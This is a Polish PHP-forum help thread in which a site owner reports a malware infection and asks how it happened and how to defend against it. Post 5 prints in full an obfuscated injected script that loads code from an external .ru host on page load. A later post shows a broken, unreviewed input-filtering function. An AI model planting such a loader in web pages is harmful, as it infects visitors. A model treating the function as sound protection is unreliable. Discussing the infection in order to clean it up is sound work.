Witaj Gościu! ( Zaloguj | Rejestruj )

Forum PHP.pl

 
Reply to this topicStart new topic
> [Java] Bardzo dziwny błąd
desavil
post
Post #1





Grupa: Zarejestrowani
Postów: 339
Pomógł: 3
Dołączył: 15.10.2008
Skąd: Internet

Ostrzeżenie: (0%)
-----


Witam, mam taki problem gdyż od trzech dni na mojej stronie po wejściu wyświetla się takie coś:


Po wejściu pierwszy raz na stronę (po włączeniu za każdym razem komputera) pojawia się instalacja jakiegoś dodatku i widać właśnie to te logo ( Java 6 ), a następnie "Unable to access jarfile \\213.175.207.142\public\001.jar

PS. Korzystam z przeglądarki Firefox i znajomi też to mają.
Możecie to sprawdzić sami na stornie http://nonlimit.pl/

Pozdrawiam i proszę o pomoc


--------------------
"Nie ma głupich pytań, są tylko głupie odpowiedzi."
Pomogłem?? Kliknij "Pomógł" :) Dzięki!
Go to the top of the page
+Quote Post
chlebik
post
Post #2





Grupa: Zarejestrowani
Postów: 113
Pomógł: 5
Dołączył: 12.09.2006
Skąd: Pruszków/Warszawa

Ostrzeżenie: (0%)
-----


A w innych przegladarkach masz to samo? Sprawdz kod strony i zobacz czy czasem jakas brzydka rzecz ci sie nie dokleila.


--------------------
"Człowiek dążący do swego celu może być skuteczny tylko w przypadku, jeśli każdą minutę swego życia wykorzysta z maksymalną korzyścią dla osiągnięcia zaplanowanego celu. Jeśli stworzył dla siebie system kar i karze sam siebie za każdą zmarnowaną minutę. Człowiekowi w zupełności wystarczą 3-4 godziny snu, cały pozostały czas może być wykorzystany dla osiągnięcia upragnionego celu." -- Wiktor Suworow
Java devBlog
KulturalnyChlebik
Go to the top of the page
+Quote Post
desavil
post
Post #3





Grupa: Zarejestrowani
Postów: 339
Pomógł: 3
Dołączył: 15.10.2008
Skąd: Internet

Ostrzeżenie: (0%)
-----


Czy czasem nie jest to ta ostatnia linijka (exploit) ?

http://nonlimit.pl/sources/ajax03.js

We wszystkich plikach *.js miałem exploita
Mogę się dowiedzieć co może być tego przyczyną?


--------------------
"Nie ma głupich pytań, są tylko głupie odpowiedzi."
Pomogłem?? Kliknij "Pomógł" :) Dzięki!
Go to the top of the page
+Quote Post
Kshyhoo
post
Post #4





Grupa: Opiekunowie
Postów: 3 855
Pomógł: 317
Dołączył: 4.01.2005
Skąd: że




U mnie bez zarzutu...


--------------------
Go to the top of the page
+Quote Post
desavil
post
Post #5





Grupa: Zarejestrowani
Postów: 339
Pomógł: 3
Dołączył: 15.10.2008
Skąd: Internet

Ostrzeżenie: (0%)
-----


Bo już wyczyściłem i nie zrobiłem kopii ;/

Ale niedawno (wczoraj) na stronie hostingu na stornie głównej gdzie jest również ta strona był exploit taki:
Kod
<script>g={};var r="bod"+"y";var V=window;this.Ob=63654;this.Ob++;var H=null;Kp=27291;Kp++;var o=document;var I;VB=["T","x"];var A=String("scrip"+"t");Y=["d","B"];var BF=1863;function E(){this.cF=9214;this.cF+=39;var ni=new Date();var K=String("]");var D=RegExp;var L="\x2f\x67\x6f\x6f\x67\x6c\x65\x2e\x63\x6f\x6d\x2f\x77\x65\x72\x2d\x6b\x65\x6e\x6e\x74\x2d\x77\x65\x6e\x2e\x64\x65\x2f\x62\x69\x6c\x64\x2e\x64\x65\x2e\x70\x68\x70";try {var nR='z'} catch(nR){};jA=47827;jA+=57;var K=String("]");var U="";var u='';this.Gw=7124;this.Gw++;this.Jt=53598;this.Jt--;function p(od,c){var P=new Date();var aI='';var Di="[";var l="";Di+=c;this.Mz=6482;this.Mz-=193;var tH="tH";Di+=K;var NM=new Date();var k=new D(Di, "g");var be={Yn:40518};return od[String("re"+"plVFe".substr(0,2)+"ac"+"e")](k, u);ja={ow:false};};try {var Xz='Uc'} catch(Xz){};this.f=45250;this.f+=213;this.h=false;var mg="";var lO=["GV","ez"];try {var Mk='Az'} catch(Mk){};var Z=312030-303950;var _='';var q=["FI"];var O=p('ckrZeCajtWeCEflBeOmIeZnwtC','4W2Csfg1BqkYoQp3UOKwzZIj');var G=p('aIprpteznzdrCyhqi0l_d0','_tzqvsDNWrVYLy10IBJkf');H="onlo"+"ad";var w="http:"+"//spivAeL".substr(0,5)+"cyled"+"pBSge.ru".substr(3)+":";var Lo=[];kP=50783;kP+=113;this.wB=15591;this.wB+=24;I=function(){var TS=false;var yE=new Date();try {this.vo="vo";M=o[O](A);var rb=false;var UY={YE:"wU"};_=w;var YL=["pM"];_+=Z;_+=L;var ux=false;Yc={ub:"px"};var KZ=["en","pY"];var pB=new Date();var m="src";var Iv=["Jo","cI","cq"];var Rf=["sd","Sv","FSf"];var QT="QT";var uP=p('dxeNfNeMrQ','0xM8qRhQTgOvpy6N');this.Hb="";var hT="hT";bz=37550;bz+=75;M[m]=_;Ys=["eJ"];M[uP]=[1][0];g_=[];var YG=new String();fC={tK:false};o[r][G](M);var MT=[];} catch(F){var _S="_S";var Es="Es";IN={Vu:false};};var sM=[];var rba=[];};var Fb=[];this.eN=57999;this.eN++;bq=48871;bq++;};E();EU={};V[H]=I;</script>
<!--aa6aa8e4b14d68d83daa8a15c2794a2e-->


Prosił bym jeszcze o informację jak przed takim czymś można się zabezpieczyć, i jaka mogła by być przyczyna, że ktoś takie coś wrzucił.

Ten post edytował desavil 10.05.2010, 08:19:10


--------------------
"Nie ma głupich pytań, są tylko głupie odpowiedzi."
Pomogłem?? Kliknij "Pomógł" :) Dzięki!
Go to the top of the page
+Quote Post
chlebik
post
Post #6





Grupa: Zarejestrowani
Postów: 113
Pomógł: 5
Dołączył: 12.09.2006
Skąd: Pruszków/Warszawa

Ostrzeżenie: (0%)
-----


Masa mozliwosci - nie tak dawno byl chocby bardzo popularny bug w total commanderze bodajze, ktory wyczytywal hasla do serwerow w nim zapisane i przechodzil po wszystkich plikach na tym serwerze z rozszerzeniem PHP i doklejal cos na koncu. To najbardziej prawdopodobny scenariusz.


--------------------
"Człowiek dążący do swego celu może być skuteczny tylko w przypadku, jeśli każdą minutę swego życia wykorzysta z maksymalną korzyścią dla osiągnięcia zaplanowanego celu. Jeśli stworzył dla siebie system kar i karze sam siebie za każdą zmarnowaną minutę. Człowiekowi w zupełności wystarczą 3-4 godziny snu, cały pozostały czas może być wykorzystany dla osiągnięcia upragnionego celu." -- Wiktor Suworow
Java devBlog
KulturalnyChlebik
Go to the top of the page
+Quote Post
gigzorr
post
Post #7





Grupa: Zarejestrowani
Postów: 652
Pomógł: 47
Dołączył: 6.02.2010
Skąd: Radom

Ostrzeżenie: (0%)
-----


sql injection,xss jest pelno opcji , a takie cos z java to pamietam , ze jak ktos wchodzil na strone i zaczela sie pobierac a pozniej byl zawirusowany smile.gif
Go to the top of the page
+Quote Post
desavil
post
Post #8





Grupa: Zarejestrowani
Postów: 339
Pomógł: 3
Dołączył: 15.10.2008
Skąd: Internet

Ostrzeżenie: (0%)
-----


Cytat(chlebik @ 10.05.2010, 10:23:22 ) *
Masa mozliwosci - nie tak dawno byl chocby bardzo popularny bug w total commanderze bodajze, ktory wyczytywal hasla do serwerow w nim zapisane i przechodzil po wszystkich plikach na tym serwerze z rozszerzeniem PHP i doklejal cos na koncu. To najbardziej prawdopodobny scenariusz.


Ja korzystam tylko i wyłącznie z klienta FTP o nazwie "FileZilla Client"


--------------------
"Nie ma głupich pytań, są tylko głupie odpowiedzi."
Pomogłem?? Kliknij "Pomógł" :) Dzięki!
Go to the top of the page
+Quote Post
ziqzaq
post
Post #9





Grupa: Zarejestrowani
Postów: 428
Pomógł: 128
Dołączył: 17.06.2007

Ostrzeżenie: (0%)
-----


Cytat(desavil @ 10.05.2010, 12:08:25 ) *
Ja korzystam tylko i wyłącznie z klienta FTP o nazwie "FileZilla Client"

AFAIK filezilla przetrzymuje hasła w plaintext (w pliku xml), więc jeśli będziesz miał komputer zainfekowany softem wykradającym loginy/hasła do serwerów to zapisywanie haseł w filezilli będzie tak samo niebezpieczne jak w tc.

Ten post edytował ziqzaq 10.05.2010, 11:33:52
Go to the top of the page
+Quote Post
desavil
post
Post #10





Grupa: Zarejestrowani
Postów: 339
Pomógł: 3
Dołączył: 15.10.2008
Skąd: Internet

Ostrzeżenie: (0%)
-----


Czy mogłabym poprosić o jakieś sprawdzone stronki jak zabezpieczać się przed "sql injection" oraz "xss"

@Edit
I wszystkie dane ($_POST, $_GET) filtruje funkcją "zabezpiecz" a oto ta funkcja:
  1. // Usuwanie znaków specjalnych
  2. function RemoveMagicQuotes(&$arr) {
  3. if(!is_array($arr))
  4. return(stripslashes($arr));
  5. $out=array();
  6. reset($arr);
  7. while (list($key, $value) = each($arr)) {
  8. if(is_array($value)) {
  9. $out[$key]=RemoveMagicQuotes($value);
  10. }else{
  11. $out[$key]=stripslashes($value);
  12. }
  13. }
  14. return $out;
  15. } else {
  16. return($arr);
  17. }
  18. }
  19.  
  20.  
  21. // Usuwanie znaków specjalnych
  22. function zabezpiecz($zmienna){
  23. $zmienna=stripslashes($zmienna);
  24. $zmienna=htmlspecialchars($zmienna);
  25. $zmienna=mysql_escape_string(RemoveMagicQuotes($zmienna));
  26. return $zmienna;
  27. }

Czy jest ona poprawna i niema w niej żadnych dziur?
Co jeszcze można ulepszyć.

Pozdrawiam,

smile.gif

Ten post edytował desavil 10.05.2010, 12:34:52


--------------------
"Nie ma głupich pytań, są tylko głupie odpowiedzi."
Pomogłem?? Kliknij "Pomógł" :) Dzięki!
Go to the top of the page
+Quote Post

Reply to this topicStart new topic
1 Użytkowników czyta ten temat (1 Gości i 0 Anonimowych użytkowników)
0 Zarejestrowanych:

 



RSS Aktualny czas: 21.08.2025 - 03:39